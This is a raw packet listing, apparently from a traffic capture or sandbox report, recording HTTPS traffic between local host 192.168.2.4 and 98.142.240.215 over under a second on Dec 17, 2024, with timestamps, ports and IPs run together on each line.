                                                                                                                                                                              Dec 17, 2024 18:12:32.038644075 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.071955919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.072083950 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.072117090 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.072190046 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.074318886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.074428082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.074435949 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.074506044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.186055899 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.186172962 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.186212063 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.186264038 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.190454006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.190546989 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.190563917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.190610886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.193592072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.193722010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.193743944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.193802118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.197757006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.197846889 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.197869062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.197915077 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.200711012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.200840950 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.200859070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.200931072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.204572916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.204660892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.204678059 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.204727888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.207361937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.207444906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.207457066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.207503080 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.210526943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.210685968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.210694075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.210738897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.214399099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.214602947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.214634895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.214690924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.217508078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.217586040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.217596054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.217648983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.221244097 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.221384048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.221393108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.221467018 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.224503040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.224626064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.224633932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.224699974 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.228135109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.228216887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.228229046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.228275061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.231126070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.231245041 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.231260061 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.231333017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.265933990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.266019106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.266052961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.266104937 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.269072056 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.269143105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.269150972 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.269196987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.378320932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.378436089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.378452063 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.378503084 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.384108067 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.384218931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.384228945 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.384280920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.387167931 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.387284994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.387294054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.387346983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.389875889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.389975071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.389983892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.390029907 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.392930031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.393023014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.393038988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.393076897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.396168947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.396265984 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.396286964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.396332026 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.399858952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.399960995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.399996042 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.400047064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.403013945 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.403121948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.403145075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.403192997 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.406259060 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.406362057 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.406392097 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.406439066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.411046982 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.411138058 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.411176920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.411223888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.414148092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.414248943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.414278030 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.414330006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.417727947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.417855024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.417885065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.417957067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.420849085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.420943022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.420984983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.421034098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.424822092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.424928904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.424957991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.425012112 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.459934950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.460211039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.460243940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.460303068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.462989092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.463107109 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.463114977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.463171005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.571475983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.571650028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.571681023 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.571732044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.575421095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.575547934 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.575557947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.575618982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.578984022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.579103947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.579112053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.579164028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.582197905 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.582304001 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.582313061 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.582370043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.585277081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.585393906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.585402012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.585444927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.589056015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.589169025 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.589176893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.589230061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.592426062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.592539072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.592547894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.592628956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.596141100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.596242905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.596251011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.596306086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.599163055 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.599275112 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.599282980 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.599337101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.602415085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.602525949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.602534056 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.602602005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.606254101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.606390953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.606405973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.606457949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.609349966 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.609479904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.609488964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.609540939 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.613014936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.613152027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.613159895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.613205910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.616755962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.616873980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.616883039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.616923094 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.652470112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.652651072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.652673960 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.652729988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.655544996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.655666113 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.655688047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.655735970 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.763528109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.763709068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.763745070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.763801098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.767872095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.767995119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.768003941 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.768054008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.771430969 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.771538973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.771550894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.771596909 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.774497986 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.774596930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.774609089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.774645090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.777709007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.777813911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.777826071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.777873039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.781539917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.781644106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.781660080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.781711102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.784563065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.784646988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.784660101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.784739971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.787818909 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.787965059 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.787976980 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.788038015 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.791688919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.791795969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.791810036 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.791860104 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.794678926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.794785976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.794795990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.794841051 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.797888041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.797985077 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.797996044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.798038960 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.801821947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.801923990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.801934958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.801971912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.805315018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.805417061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.805432081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.805483103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.808343887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.808442116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.808455944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.808501005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.844748020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.844939947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.844963074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.845014095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.848366022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.848488092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.848496914 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.848546028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.955501080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.955610037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.955635071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.955691099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.960041046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.960117102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.960127115 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.960171938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.963231087 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.963336945 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.963346958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.963398933 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.966300011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.966384888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.966392994 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.966438055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.970257998 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.970345974 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.970355034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.970422983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.973476887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.973558903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.973567009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.973614931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.976444960 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.976515055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.976525068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.976574898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.980487108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.980561972 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.980598927 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.980720997 CET49731443192.168.2.498.142.240.215
